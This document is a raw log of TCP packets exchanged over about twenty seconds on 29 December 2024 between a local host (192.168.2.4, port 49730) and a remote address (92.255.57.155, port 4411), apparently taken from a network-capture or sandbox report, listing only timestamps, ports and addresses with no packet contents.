Dec 29, 2024 09:50:25.405106068 CET	49730	4411	192.168.2.4	92.255.57.155
Dec 29, 2024 09:50:25.410895109 CET	4411	49730	92.255.57.155	192.168.2.4
Dec 29, 2024 09:50:25.454605103 CET	4411	49730	92.255.57.155	192.168.2.4
Dec 29, 2024 09:50:25.454744101 CET	49730	4411	192.168.2.4	92.255.57.155
Dec 29, 2024 09:50:25.524480104 CET	4411	49730	92.255.57.155	192.168.2.4
Dec 29, 2024 09:50:25.525094032 CET	49730	4411	192.168.2.4	92.255.57.155
Dec 29, 2024 09:50:25.574141979 CET	4411	49730	92.255.57.155	192.168.2.4
Dec 29, 2024 09:50:25.621313095 CET	4411	49730	92.255.57.155	192.168.2.4
Dec 29, 2024 09:50:25.644376993 CET	4411	49730	92.255.57.155	192.168.2.4
Dec 29, 2024 09:50:25.645576954 CET	49730	4411	192.168.2.4	92.255.57.155
Dec 29, 2024 09:50:25.735223055 CET	4411	49730	92.255.57.155	192.168.2.4
Dec 29, 2024 09:50:25.764939070 CET	4411	49730	92.255.57.155	192.168.2.4
Dec 29, 2024 09:50:25.765301943 CET	49730	4411	192.168.2.4	92.255.57.155
Dec 29, 2024 09:50:25.889849901 CET	4411	49730	92.255.57.155	192.168.2.4
Dec 29, 2024 09:50:26.091140032 CET	49730	4411	192.168.2.4	92.255.57.155
Dec 29, 2024 09:50:26.210522890 CET	4411	49730	92.255.57.155	192.168.2.4
Dec 29, 2024 09:50:26.216594934 CET	49730	4411	192.168.2.4	92.255.57.155
Dec 29, 2024 09:50:26.335941076 CET	4411	49730	92.255.57.155	192.168.2.4
Dec 29, 2024 09:50:26.497533083 CET	49730	4411	192.168.2.4	92.255.57.155
Dec 29, 2024 09:50:26.542762995 CET	4411	49730	92.255.57.155	192.168.2.4
Dec 29, 2024 09:50:26.616846085 CET	4411	49730	92.255.57.155	192.168.2.4
Dec 29, 2024 09:50:26.616898060 CET	49730	4411	192.168.2.4	92.255.57.155
Dec 29, 2024 09:50:26.736244917 CET	4411	49730	92.255.57.155	192.168.2.4
Dec 29, 2024 09:50:26.795032978 CET	4411	49730	92.255.57.155	192.168.2.4
Dec 29, 2024 09:50:26.815773964 CET	49730	4411	192.168.2.4	92.255.57.155
Dec 29, 2024 09:50:26.935079098 CET	4411	49730	92.255.57.155	192.168.2.4
Dec 29, 2024 09:50:26.935146093 CET	49730	4411	192.168.2.4	92.255.57.155
Dec 29, 2024 09:50:27.005260944 CET	4411	49730	92.255.57.155	192.168.2.4
Dec 29, 2024 09:50:27.054483891 CET	4411	49730	92.255.57.155	192.168.2.4
Dec 29, 2024 09:50:27.054544926 CET	49730	4411	192.168.2.4	92.255.57.155
Dec 29, 2024 09:50:27.173779964 CET	4411	49730	92.255.57.155	192.168.2.4
Dec 29, 2024 09:50:27.175765991 CET	49730	4411	192.168.2.4	92.255.57.155
Dec 29, 2024 09:50:27.295303106 CET	4411	49730	92.255.57.155	192.168.2.4
Dec 29, 2024 09:50:27.313200951 CET	49730	4411	192.168.2.4	92.255.57.155
Dec 29, 2024 09:50:27.431715965 CET	4411	49730	92.255.57.155	192.168.2.4
Dec 29, 2024 09:50:27.432431936 CET	4411	49730	92.255.57.155	192.168.2.4
Dec 29, 2024 09:50:27.432692051 CET	49730	4411	192.168.2.4	92.255.57.155
Dec 29, 2024 09:50:27.551975965 CET	4411	49730	92.255.57.155	192.168.2.4
Dec 29, 2024 09:50:27.729998112 CET	4411	49730	92.255.57.155	192.168.2.4
Dec 29, 2024 09:50:27.733196020 CET	49730	4411	192.168.2.4	92.255.57.155
Dec 29, 2024 09:50:27.852557898 CET	4411	49730	92.255.57.155	192.168.2.4
Dec 29, 2024 09:50:27.856740952 CET	49730	4411	192.168.2.4	92.255.57.155
Dec 29, 2024 09:50:27.976125956 CET	4411	49730	92.255.57.155	192.168.2.4
Dec 29, 2024 09:50:27.984050989 CET	4411	49730	92.255.57.155	192.168.2.4
Dec 29, 2024 09:50:27.993192911 CET	49730	4411	192.168.2.4	92.255.57.155
Dec 29, 2024 09:50:28.156483889 CET	4411	49730	92.255.57.155	192.168.2.4
Dec 29, 2024 09:50:28.156533957 CET	49730	4411	192.168.2.4	92.255.57.155
Dec 29, 2024 09:50:28.275835991 CET	4411	49730	92.255.57.155	192.168.2.4
Dec 29, 2024 09:50:28.275914907 CET	49730	4411	192.168.2.4	92.255.57.155
Dec 29, 2024 09:50:28.349203110 CET	4411	49730	92.255.57.155	192.168.2.4
Dec 29, 2024 09:50:28.395256996 CET	4411	49730	92.255.57.155	192.168.2.4
Dec 29, 2024 09:50:28.395303965 CET	49730	4411	192.168.2.4	92.255.57.155
Dec 29, 2024 09:50:28.515022039 CET	4411	49730	92.255.57.155	192.168.2.4
Dec 29, 2024 09:50:28.515067101 CET	49730	4411	192.168.2.4	92.255.57.155
Dec 29, 2024 09:50:28.634618044 CET	4411	49730	92.255.57.155	192.168.2.4
Dec 29, 2024 09:50:28.634668112 CET	49730	4411	192.168.2.4	92.255.57.155
Dec 29, 2024 09:50:28.647855043 CET	4411	49730	92.255.57.155	192.168.2.4
Dec 29, 2024 09:50:28.647902966 CET	49730	4411	192.168.2.4	92.255.57.155
Dec 29, 2024 09:50:28.796550989 CET	4411	49730	92.255.57.155	192.168.2.4
Dec 29, 2024 09:50:28.796597004 CET	49730	4411	192.168.2.4	92.255.57.155
Dec 29, 2024 09:50:28.845282078 CET	4411	49730	92.255.57.155	192.168.2.4
Dec 29, 2024 09:50:28.915935040 CET	4411	49730	92.255.57.155	192.168.2.4
Dec 29, 2024 09:50:28.915977955 CET	49730	4411	192.168.2.4	92.255.57.155
Dec 29, 2024 09:50:28.964601040 CET	4411	49730	92.255.57.155	192.168.2.4
Dec 29, 2024 09:50:29.035676956 CET	4411	49730	92.255.57.155	192.168.2.4
Dec 29, 2024 09:50:29.035726070 CET	49730	4411	192.168.2.4	92.255.57.155
Dec 29, 2024 09:50:29.055428028 CET	4411	49730	92.255.57.155	192.168.2.4
Dec 29, 2024 09:50:29.170406103 CET	49730	4411	192.168.2.4	92.255.57.155
Dec 29, 2024 09:50:29.175074100 CET	4411	49730	92.255.57.155	192.168.2.4
Dec 29, 2024 09:50:29.175216913 CET	49730	4411	192.168.2.4	92.255.57.155
Dec 29, 2024 09:50:29.265968084 CET	4411	49730	92.255.57.155	192.168.2.4
Dec 29, 2024 09:50:29.266100883 CET	49730	4411	192.168.2.4	92.255.57.155
Dec 29, 2024 09:50:29.336487055 CET	4411	49730	92.255.57.155	192.168.2.4
Dec 29, 2024 09:50:29.336680889 CET	49730	4411	192.168.2.4	92.255.57.155
Dec 29, 2024 09:50:29.385226011 CET	4411	49730	92.255.57.155	192.168.2.4
Dec 29, 2024 09:50:29.385380030 CET	4411	49730	92.255.57.155	192.168.2.4
Dec 29, 2024 09:50:29.455919027 CET	4411	49730	92.255.57.155	192.168.2.4
Dec 29, 2024 09:50:29.505083084 CET	4411	49730	92.255.57.155	192.168.2.4
Dec 29, 2024 09:50:29.511220932 CET	49730	4411	192.168.2.4	92.255.57.155
Dec 29, 2024 09:50:29.567348003 CET	49730	4411	192.168.2.4	92.255.57.155
Dec 29, 2024 09:50:29.666378975 CET	4411	49730	92.255.57.155	192.168.2.4
Dec 29, 2024 09:50:29.686664104 CET	4411	49730	92.255.57.155	192.168.2.4
Dec 29, 2024 09:50:29.686913967 CET	49730	4411	192.168.2.4	92.255.57.155
Dec 29, 2024 09:50:29.806221962 CET	4411	49730	92.255.57.155	192.168.2.4
Dec 29, 2024 09:50:29.807301998 CET	49730	4411	192.168.2.4	92.255.57.155
Dec 29, 2024 09:50:29.926749945 CET	4411	49730	92.255.57.155	192.168.2.4
Dec 29, 2024 09:50:30.267599106 CET	4411	49730	92.255.57.155	192.168.2.4
Dec 29, 2024 09:50:30.269550085 CET	49730	4411	192.168.2.4	92.255.57.155
Dec 29, 2024 09:50:30.388907909 CET	4411	49730	92.255.57.155	192.168.2.4
Dec 29, 2024 09:50:30.482067108 CET	49730	4411	192.168.2.4	92.255.57.155
Dec 29, 2024 09:50:30.601450920 CET	4411	49730	92.255.57.155	192.168.2.4
Dec 29, 2024 09:50:30.601552010 CET	49730	4411	192.168.2.4	92.255.57.155
Dec 29, 2024 09:50:30.720959902 CET	4411	49730	92.255.57.155	192.168.2.4
Dec 29, 2024 09:50:30.825545073 CET	49730	4411	192.168.2.4	92.255.57.155
Dec 29, 2024 09:50:30.933815002 CET	4411	49730	92.255.57.155	192.168.2.4
Dec 29, 2024 09:50:30.933866024 CET	49730	4411	192.168.2.4	92.255.57.155
Dec 29, 2024 09:50:30.944849968 CET	4411	49730	92.255.57.155	192.168.2.4
Dec 29, 2024 09:50:30.944889069 CET	49730	4411	192.168.2.4	92.255.57.155
Dec 29, 2024 09:50:31.053483009 CET	4411	49730	92.255.57.155	192.168.2.4
Dec 29, 2024 09:50:31.053544998 CET	49730	4411	192.168.2.4	92.255.57.155
Dec 29, 2024 09:50:31.064188004 CET	4411	49730	92.255.57.155	192.168.2.4
Dec 29, 2024 09:50:31.144315958 CET	4411	49730	92.255.57.155	192.168.2.4
Dec 29, 2024 09:50:31.172899961 CET	4411	49730	92.255.57.155	192.168.2.4
Dec 29, 2024 09:50:31.173180103 CET	49730	4411	192.168.2.4	92.255.57.155
Dec 29, 2024 09:50:31.292455912 CET	4411	49730	92.255.57.155	192.168.2.4
Dec 29, 2024 09:50:31.383522987 CET	4411	49730	92.255.57.155	192.168.2.4
Dec 29, 2024 09:50:31.388108015 CET	49730	4411	192.168.2.4	92.255.57.155
Dec 29, 2024 09:50:31.503068924 CET	4411	49730	92.255.57.155	192.168.2.4
Dec 29, 2024 09:50:31.507342100 CET	4411	49730	92.255.57.155	192.168.2.4
Dec 29, 2024 09:50:31.507469893 CET	49730	4411	192.168.2.4	92.255.57.155
Dec 29, 2024 09:50:31.626768112 CET	4411	49730	92.255.57.155	192.168.2.4
Dec 29, 2024 09:50:31.635011911 CET	4411	49730	92.255.57.155	192.168.2.4
Dec 29, 2024 09:50:31.635974884 CET	49730	4411	192.168.2.4	92.255.57.155
Dec 29, 2024 09:50:31.796471119 CET	4411	49730	92.255.57.155	192.168.2.4
Dec 29, 2024 09:50:31.875349045 CET	49730	4411	192.168.2.4	92.255.57.155
Dec 29, 2024 09:50:31.994741917 CET	4411	49730	92.255.57.155	192.168.2.4
Dec 29, 2024 09:50:32.351876020 CET	4411	49730	92.255.57.155	192.168.2.4
Dec 29, 2024 09:50:32.361840963 CET	49730	4411	192.168.2.4	92.255.57.155
Dec 29, 2024 09:50:32.481095076 CET	4411	49730	92.255.57.155	192.168.2.4
Dec 29, 2024 09:50:33.559895992 CET	49730	4411	192.168.2.4	92.255.57.155
Dec 29, 2024 09:50:33.679183006 CET	4411	49730	92.255.57.155	192.168.2.4
Dec 29, 2024 09:50:33.919353962 CET	49730	4411	192.168.2.4	92.255.57.155
Dec 29, 2024 09:50:34.011259079 CET	4411	49730	92.255.57.155	192.168.2.4
Dec 29, 2024 09:50:34.038650036 CET	4411	49730	92.255.57.155	192.168.2.4
Dec 29, 2024 09:50:34.039288044 CET	49730	4411	192.168.2.4	92.255.57.155
Dec 29, 2024 09:50:34.158612967 CET	4411	49730	92.255.57.155	192.168.2.4
Dec 29, 2024 09:50:34.158657074 CET	49730	4411	192.168.2.4	92.255.57.155
Dec 29, 2024 09:50:34.278027058 CET	4411	49730	92.255.57.155	192.168.2.4
Dec 29, 2024 09:50:34.278078079 CET	49730	4411	192.168.2.4	92.255.57.155
Dec 29, 2024 09:50:34.370883942 CET	4411	49730	92.255.57.155	192.168.2.4
Dec 29, 2024 09:50:34.370938063 CET	49730	4411	192.168.2.4	92.255.57.155
Dec 29, 2024 09:50:34.397377968 CET	4411	49730	92.255.57.155	192.168.2.4
Dec 29, 2024 09:50:34.397418976 CET	49730	4411	192.168.2.4	92.255.57.155
Dec 29, 2024 09:50:34.490246058 CET	4411	49730	92.255.57.155	192.168.2.4
Dec 29, 2024 09:50:34.490288019 CET	49730	4411	192.168.2.4	92.255.57.155
Dec 29, 2024 09:50:34.571948051 CET	4411	49730	92.255.57.155	192.168.2.4
Dec 29, 2024 09:50:34.617666960 CET	4411	49730	92.255.57.155	192.168.2.4
Dec 29, 2024 09:50:34.617712975 CET	49730	4411	192.168.2.4	92.255.57.155
Dec 29, 2024 09:50:34.691200018 CET	4411	49730	92.255.57.155	192.168.2.4
Dec 29, 2024 09:50:34.691246033 CET	49730	4411	192.168.2.4	92.255.57.155
Dec 29, 2024 09:50:34.737023115 CET	4411	49730	92.255.57.155	192.168.2.4
Dec 29, 2024 09:50:34.737075090 CET	49730	4411	192.168.2.4	92.255.57.155
Dec 29, 2024 09:50:34.810574055 CET	4411	49730	92.255.57.155	192.168.2.4
Dec 29, 2024 09:50:34.820319891 CET	4411	49730	92.255.57.155	192.168.2.4
Dec 29, 2024 09:50:34.872096062 CET	49730	4411	192.168.2.4	92.255.57.155
Dec 29, 2024 09:50:34.910856009 CET	4411	49730	92.255.57.155	192.168.2.4
Dec 29, 2024 09:50:34.910964012 CET	49730	4411	192.168.2.4	92.255.57.155
Dec 29, 2024 09:50:35.030539036 CET	4411	49730	92.255.57.155	192.168.2.4
Dec 29, 2024 09:50:35.030635118 CET	49730	4411	192.168.2.4	92.255.57.155
Dec 29, 2024 09:50:35.163163900 CET	4411	49730	92.255.57.155	192.168.2.4
Dec 29, 2024 09:50:35.167387009 CET	49730	4411	192.168.2.4	92.255.57.155
Dec 29, 2024 09:50:35.356664896 CET	4411	49730	92.255.57.155	192.168.2.4
Dec 29, 2024 09:50:35.360061884 CET	49730	4411	192.168.2.4	92.255.57.155
Dec 29, 2024 09:50:35.360527992 CET	4411	49730	92.255.57.155	192.168.2.4
Dec 29, 2024 09:50:35.479562998 CET	4411	49730	92.255.57.155	192.168.2.4
Dec 29, 2024 09:50:35.479655027 CET	49730	4411	192.168.2.4	92.255.57.155
Dec 29, 2024 09:50:35.599087954 CET	4411	49730	92.255.57.155	192.168.2.4
Dec 29, 2024 09:50:35.951246977 CET	49730	4411	192.168.2.4	92.255.57.155
Dec 29, 2024 09:50:36.070936918 CET	4411	49730	92.255.57.155	192.168.2.4
Dec 29, 2024 09:50:36.184987068 CET	49730	4411	192.168.2.4	92.255.57.155
Dec 29, 2024 09:50:36.304275036 CET	4411	49730	92.255.57.155	192.168.2.4
Dec 29, 2024 09:50:36.402690887 CET	4411	49730	92.255.57.155	192.168.2.4
Dec 29, 2024 09:50:36.403723001 CET	49730	4411	192.168.2.4	92.255.57.155
Dec 29, 2024 09:50:36.522975922 CET	4411	49730	92.255.57.155	192.168.2.4
Dec 29, 2024 09:50:36.544271946 CET	49730	4411	192.168.2.4	92.255.57.155
Dec 29, 2024 09:50:36.636704922 CET	4411	49730	92.255.57.155	192.168.2.4
Dec 29, 2024 09:50:36.663516045 CET	4411	49730	92.255.57.155	192.168.2.4
Dec 29, 2024 09:50:36.663563013 CET	49730	4411	192.168.2.4	92.255.57.155
Dec 29, 2024 09:50:36.782844067 CET	4411	49730	92.255.57.155	192.168.2.4
Dec 29, 2024 09:50:36.782901049 CET	49730	4411	192.168.2.4	92.255.57.155
Dec 29, 2024 09:50:36.902127028 CET	4411	49730	92.255.57.155	192.168.2.4
Dec 29, 2024 09:50:36.935113907 CET	49730	4411	192.168.2.4	92.255.57.155
Dec 29, 2024 09:50:37.028152943 CET	4411	49730	92.255.57.155	192.168.2.4
Dec 29, 2024 09:50:37.028213978 CET	49730	4411	192.168.2.4	92.255.57.155
Dec 29, 2024 09:50:37.054379940 CET	4411	49730	92.255.57.155	192.168.2.4
Dec 29, 2024 09:50:37.054425955 CET	49730	4411	192.168.2.4	92.255.57.155
Dec 29, 2024 09:50:37.147789001 CET	4411	49730	92.255.57.155	192.168.2.4
Dec 29, 2024 09:50:37.173732042 CET	4411	49730	92.255.57.155	192.168.2.4
Dec 29, 2024 09:50:37.264888048 CET	4411	49730	92.255.57.155	192.168.2.4
Dec 29, 2024 09:50:37.269207954 CET	49730	4411	192.168.2.4	92.255.57.155
Dec 29, 2024 09:50:37.358340979 CET	4411	49730	92.255.57.155	192.168.2.4
Dec 29, 2024 09:50:37.388436079 CET	4411	49730	92.255.57.155	192.168.2.4
Dec 29, 2024 09:50:37.388514042 CET	49730	4411	192.168.2.4	92.255.57.155
Dec 29, 2024 09:50:37.507777929 CET	4411	49730	92.255.57.155	192.168.2.4
Dec 29, 2024 09:50:37.507874012 CET	49730	4411	192.168.2.4	92.255.57.155
Dec 29, 2024 09:50:37.518901110 CET	4411	49730	92.255.57.155	192.168.2.4
Dec 29, 2024 09:50:37.559602976 CET	49730	4411	192.168.2.4	92.255.57.155
Dec 29, 2024 09:50:37.668549061 CET	4411	49730	92.255.57.155	192.168.2.4
Dec 29, 2024 09:50:37.668637037 CET	49730	4411	192.168.2.4	92.255.57.155
Dec 29, 2024 09:50:37.718652010 CET	4411	49730	92.255.57.155	192.168.2.4
Dec 29, 2024 09:50:37.788044930 CET	4411	49730	92.255.57.155	192.168.2.4
Dec 29, 2024 09:50:37.788141966 CET	49730	4411	192.168.2.4	92.255.57.155
Dec 29, 2024 09:50:37.907749891 CET	4411	49730	92.255.57.155	192.168.2.4
Dec 29, 2024 09:50:38.077884912 CET	4411	49730	92.255.57.155	192.168.2.4
Dec 29, 2024 09:50:38.081916094 CET	49730	4411	192.168.2.4	92.255.57.155
Dec 29, 2024 09:50:38.201229095 CET	4411	49730	92.255.57.155	192.168.2.4
Dec 29, 2024 09:50:38.403706074 CET	49730	4411	192.168.2.4	92.255.57.155
Dec 29, 2024 09:50:38.523065090 CET	4411	49730	92.255.57.155	192.168.2.4
Dec 29, 2024 09:50:38.523125887 CET	49730	4411	192.168.2.4	92.255.57.155
Dec 29, 2024 09:50:38.642467976 CET	4411	49730	92.255.57.155	192.168.2.4
Dec 29, 2024 09:50:38.642527103 CET	49730	4411	192.168.2.4	92.255.57.155
Dec 29, 2024 09:50:38.761871099 CET	4411	49730	92.255.57.155	192.168.2.4
Dec 29, 2024 09:50:38.761923075 CET	49730	4411	192.168.2.4	92.255.57.155
Dec 29, 2024 09:50:38.855269909 CET	4411	49730	92.255.57.155	192.168.2.4
Dec 29, 2024 09:50:38.881191015 CET	4411	49730	92.255.57.155	192.168.2.4
Dec 29, 2024 09:50:38.881239891 CET	49730	4411	192.168.2.4	92.255.57.155
Dec 29, 2024 09:50:39.000621080 CET	4411	49730	92.255.57.155	192.168.2.4
Dec 29, 2024 09:50:39.000686884 CET	49730	4411	192.168.2.4	92.255.57.155
Dec 29, 2024 09:50:39.065639973 CET	4411	49730	92.255.57.155	192.168.2.4
Dec 29, 2024 09:50:39.120249033 CET	4411	49730	92.255.57.155	192.168.2.4
Dec 29, 2024 09:50:39.125210047 CET	49730	4411	192.168.2.4	92.255.57.155
Dec 29, 2024 09:50:39.211107969 CET	4411	49730	92.255.57.155	192.168.2.4
Dec 29, 2024 09:50:39.244554043 CET	4411	49730	92.255.57.155	192.168.2.4
Dec 29, 2024 09:50:39.245347023 CET	49730	4411	192.168.2.4	92.255.57.155
Dec 29, 2024 09:50:39.318907976 CET	4411	49730	92.255.57.155	192.168.2.4
Dec 29, 2024 09:50:39.365046024 CET	4411	49730	92.255.57.155	192.168.2.4
Dec 29, 2024 09:50:39.365181923 CET	49730	4411	192.168.2.4	92.255.57.155
Dec 29, 2024 09:50:39.421416044 CET	4411	49730	92.255.57.155	192.168.2.4
Dec 29, 2024 09:50:39.484988928 CET	4411	49730	92.255.57.155	192.168.2.4
Dec 29, 2024 09:50:39.485075951 CET	49730	4411	192.168.2.4	92.255.57.155
Dec 29, 2024 09:50:39.574975014 CET	4411	49730	92.255.57.155	192.168.2.4
Dec 29, 2024 09:50:39.604461908 CET	4411	49730	92.255.57.155	192.168.2.4
Dec 29, 2024 09:50:39.604568005 CET	49730	4411	192.168.2.4	92.255.57.155
Dec 29, 2024 09:50:39.724451065 CET	4411	49730	92.255.57.155	192.168.2.4
Dec 29, 2024 09:50:40.109210968 CET	49730	4411	192.168.2.4	92.255.57.155
Dec 29, 2024 09:50:40.228688955 CET	4411	49730	92.255.57.155	192.168.2.4
Dec 29, 2024 09:50:40.228732109 CET	49730	4411	192.168.2.4	92.255.57.155
Dec 29, 2024 09:50:40.348047972 CET	4411	49730	92.255.57.155	192.168.2.4
Dec 29, 2024 09:50:40.348098993 CET	49730	4411	192.168.2.4	92.255.57.155
Dec 29, 2024 09:50:40.467395067 CET	4411	49730	92.255.57.155	192.168.2.4
Dec 29, 2024 09:50:40.467446089 CET	49730	4411	192.168.2.4	92.255.57.155
Dec 29, 2024 09:50:40.560743093 CET	4411	49730	92.255.57.155	192.168.2.4
Dec 29, 2024 09:50:40.586757898 CET	4411	49730	92.255.57.155	192.168.2.4
Dec 29, 2024 09:50:40.586807013 CET	49730	4411	192.168.2.4	92.255.57.155
Dec 29, 2024 09:50:40.706129074 CET	4411	49730	92.255.57.155	192.168.2.4
Dec 29, 2024 09:50:40.797190905 CET	4411	49730	92.255.57.155	192.168.2.4
Dec 29, 2024 09:50:40.799213886 CET	49730	4411	192.168.2.4	92.255.57.155
Dec 29, 2024 09:50:40.916824102 CET	4411	49730	92.255.57.155	192.168.2.4
Dec 29, 2024 09:50:40.916884899 CET	49730	4411	192.168.2.4	92.255.57.155
Dec 29, 2024 09:50:40.918711901 CET	4411	49730	92.255.57.155	192.168.2.4
Dec 29, 2024 09:50:40.918759108 CET	49730	4411	192.168.2.4	92.255.57.155
Dec 29, 2024 09:50:41.036170959 CET	4411	49730	92.255.57.155	192.168.2.4
Dec 29, 2024 09:50:41.036309004 CET	49730	4411	192.168.2.4	92.255.57.155
Dec 29, 2024 09:50:41.038022995 CET	4411	49730	92.255.57.155	192.168.2.4
Dec 29, 2024 09:50:41.050940990 CET	4411	49730	92.255.57.155	192.168.2.4
Dec 29, 2024 09:50:41.171251059 CET	49730	4411	192.168.2.4	92.255.57.155
Dec 29, 2024 09:50:41.196472883 CET	4411	49730	92.255.57.155	192.168.2.4
Dec 29, 2024 09:50:41.204226971 CET	49730	4411	192.168.2.4	92.255.57.155
Dec 29, 2024 09:50:41.323502064 CET	4411	49730	92.255.57.155	192.168.2.4
Dec 29, 2024 09:50:41.419394016 CET	4411	49730	92.255.57.155	192.168.2.4
Dec 29, 2024 09:50:41.421216011 CET	49730	4411	192.168.2.4	92.255.57.155
Dec 29, 2024 09:50:41.540523052 CET	4411	49730	92.255.57.155	192.168.2.4
Dec 29, 2024 09:50:41.631320953 CET	4411	49730	92.255.57.155	192.168.2.4
Dec 29, 2024 09:50:41.632142067 CET	49730	4411	192.168.2.4	92.255.57.155
Dec 29, 2024 09:50:41.751540899 CET	4411	49730	92.255.57.155	192.168.2.4
Dec 29, 2024 09:50:42.247484922 CET	49730	4411	192.168.2.4	92.255.57.155
Dec 29, 2024 09:50:42.367563009 CET	4411	49730	92.255.57.155	192.168.2.4
Dec 29, 2024 09:50:42.367624044 CET	49730	4411	192.168.2.4	92.255.57.155
Dec 29, 2024 09:50:42.487152100 CET	4411	49730	92.255.57.155	192.168.2.4
Dec 29, 2024 09:50:42.487200022 CET	49730	4411	192.168.2.4	92.255.57.155
Dec 29, 2024 09:50:42.606544971 CET	4411	49730	92.255.57.155	192.168.2.4
Dec 29, 2024 09:50:42.606628895 CET	49730	4411	192.168.2.4	92.255.57.155
Dec 29, 2024 09:50:42.699142933 CET	4411	49730	92.255.57.155	192.168.2.4
Dec 29, 2024 09:50:42.725939989 CET	4411	49730	92.255.57.155	192.168.2.4
Dec 29, 2024 09:50:42.725986958 CET	49730	4411	192.168.2.4	92.255.57.155
Dec 29, 2024 09:50:42.845216990 CET	4411	49730	92.255.57.155	192.168.2.4
Dec 29, 2024 09:50:42.845268965 CET	49730	4411	192.168.2.4	92.255.57.155
Dec 29, 2024 09:50:42.909379959 CET	4411	49730	92.255.57.155	192.168.2.4
Dec 29, 2024 09:50:42.909427881 CET	49730	4411	192.168.2.4	92.255.57.155
Dec 29, 2024 09:50:42.964586020 CET	4411	49730	92.255.57.155	192.168.2.4
Dec 29, 2024 09:50:42.964662075 CET	49730	4411	192.168.2.4	92.255.57.155
Dec 29, 2024 09:50:43.028745890 CET	4411	49730	92.255.57.155	192.168.2.4
Dec 29, 2024 09:50:43.055664062 CET	4411	49730	92.255.57.155	192.168.2.4
Dec 29, 2024 09:50:43.124640942 CET	4411	49730	92.255.57.155	192.168.2.4
Dec 29, 2024 09:50:43.124721050 CET	49730	4411	192.168.2.4	92.255.57.155
Dec 29, 2024 09:50:43.244059086 CET	4411	49730	92.255.57.155	192.168.2.4
Dec 29, 2024 09:50:43.306431055 CET	4411	49730	92.255.57.155	192.168.2.4
Dec 29, 2024 09:50:43.309216022 CET	49730	4411	192.168.2.4	92.255.57.155
Dec 29, 2024 09:50:43.428807974 CET	4411	49730	92.255.57.155	192.168.2.4
Dec 29, 2024 09:50:43.454818964 CET	4411	49730	92.255.57.155	192.168.2.4
Dec 29, 2024 09:50:43.457217932 CET	49730	4411	192.168.2.4	92.255.57.155
Dec 29, 2024 09:50:43.624406099 CET	4411	49730	92.255.57.155	192.168.2.4
Dec 29, 2024 09:50:43.624505043 CET	49730	4411	192.168.2.4	92.255.57.155
Dec 29, 2024 09:50:43.639295101 CET	4411	49730	92.255.57.155	192.168.2.4
Dec 29, 2024 09:50:43.743792057 CET	4411	49730	92.255.57.155	192.168.2.4
Dec 29, 2024 09:50:43.743908882 CET	49730	4411	192.168.2.4	92.255.57.155
Dec 29, 2024 09:50:43.863264084 CET	4411	49730	92.255.57.155	192.168.2.4
Dec 29, 2024 09:50:43.997464895 CET	49730	4411	192.168.2.4	92.255.57.155
Dec 29, 2024 09:50:44.117063046 CET	4411	49730	92.255.57.155	192.168.2.4
Dec 29, 2024 09:50:44.266999006 CET	4411	49730	92.255.57.155	192.168.2.4
Dec 29, 2024 09:50:44.267987967 CET	49730	4411	192.168.2.4	92.255.57.155
Dec 29, 2024 09:50:44.387336016 CET	4411	49730	92.255.57.155	192.168.2.4
Dec 29, 2024 09:50:44.387387991 CET	49730	4411	192.168.2.4	92.255.57.155
Dec 29, 2024 09:50:44.477066040 CET	4411	49730	92.255.57.155	192.168.2.4
Dec 29, 2024 09:50:44.477123022 CET	49730	4411	192.168.2.4	92.255.57.155
Dec 29, 2024 09:50:44.507225037 CET	4411	49730	92.255.57.155	192.168.2.4
Dec 29, 2024 09:50:44.507272005 CET	49730	4411	192.168.2.4	92.255.57.155
Dec 29, 2024 09:50:44.596529007 CET	4411	49730	92.255.57.155	192.168.2.4
Dec 29, 2024 09:50:44.596579075 CET	49730	4411	192.168.2.4	92.255.57.155
Dec 29, 2024 09:50:44.626594067 CET	4411	49730	92.255.57.155	192.168.2.4
Dec 29, 2024 09:50:44.715987921 CET	4411	49730	92.255.57.155	192.168.2.4
Dec 29, 2024 09:50:44.716188908 CET	49730	4411	192.168.2.4	92.255.57.155
Dec 29, 2024 09:50:44.835617065 CET	4411	49730	92.255.57.155	192.168.2.4
Dec 29, 2024 09:50:44.835670948 CET	49730	4411	192.168.2.4	92.255.57.155
Dec 29, 2024 09:50:44.920968056 CET	4411	49730	92.255.57.155	192.168.2.4
Dec 29, 2024 09:50:44.921024084 CET	49730	4411	192.168.2.4	92.255.57.155
Dec 29, 2024 09:50:44.955039024 CET	4411	49730	92.255.57.155	192.168.2.4
Dec 29, 2024 09:50:44.955130100 CET	49730	4411	192.168.2.4	92.255.57.155
Dec 29, 2024 09:50:45.040301085 CET	4411	49730	92.255.57.155	192.168.2.4
Dec 29, 2024 09:50:45.045968056 CET	4411	49730	92.255.57.155	192.168.2.4
Dec 29, 2024 09:50:45.046169043 CET	49730	4411	192.168.2.4	92.255.57.155
Dec 29, 2024 09:50:45.136493921 CET	4411	49730	92.255.57.155	192.168.2.4
Dec 29, 2024 09:50:45.144335985 CET	49730	4411	192.168.2.4	92.255.57.155
Dec 29, 2024 09:50:45.165551901 CET	4411	49730	92.255.57.155	192.168.2.4
Dec 29, 2024 09:50:45.264271975 CET	4411	49730	92.255.57.155	192.168.2.4
Dec 29, 2024 09:50:45.267323017 CET	49730	4411	192.168.2.4	92.255.57.155
Dec 29, 2024 09:50:45.386782885 CET	4411	49730	92.255.57.155	192.168.2.4
Dec 29, 2024 09:50:45.386893034 CET	49730	4411	192.168.2.4	92.255.57.155
Dec 29, 2024 09:50:45.418958902 CET	4411	49730	92.255.57.155	192.168.2.4
Dec 29, 2024 09:50:45.548456907 CET	4411	49730	92.255.57.155	192.168.2.4
Dec 29, 2024 09:50:45.548743010 CET	49730	4411	192.168.2.4	92.255.57.155
Dec 29, 2024 09:50:45.597278118 CET	4411	49730	92.255.57.155	192.168.2.4
Dec 29, 2024 09:50:45.668072939 CET	4411	49730	92.255.57.155	192.168.2.4
Dec 29, 2024 09:50:45.668200970 CET	49730	4411	192.168.2.4	92.255.57.155
Dec 29, 2024 09:50:45.787518024 CET	4411	49730	92.255.57.155	192.168.2.4
Dec 29, 2024 09:50:45.787707090 CET	49730	4411	192.168.2.4	92.255.57.155
Dec 29, 2024 09:50:45.907179117 CET	4411	49730	92.255.57.155	192.168.2.4
Dec 29, 2024 09:50:45.944504976 CET	4411	49730	92.255.57.155	192.168.2.4
Dec 29, 2024 09:50:45.946338892 CET	49730	4411	192.168.2.4	92.255.57.155
Dec 29, 2024 09:50:46.065773010 CET	4411	49730	92.255.57.155	192.168.2.4
Dec 29, 2024 09:50:46.242157936 CET	4411	49730	92.255.57.155	192.168.2.4
Dec 29, 2024 09:50:46.243164062 CET	49730	4411	192.168.2.4	92.255.57.155
Dec 29, 2024 09:50:46.362405062 CET	4411	49730	92.255.57.155	192.168.2.4
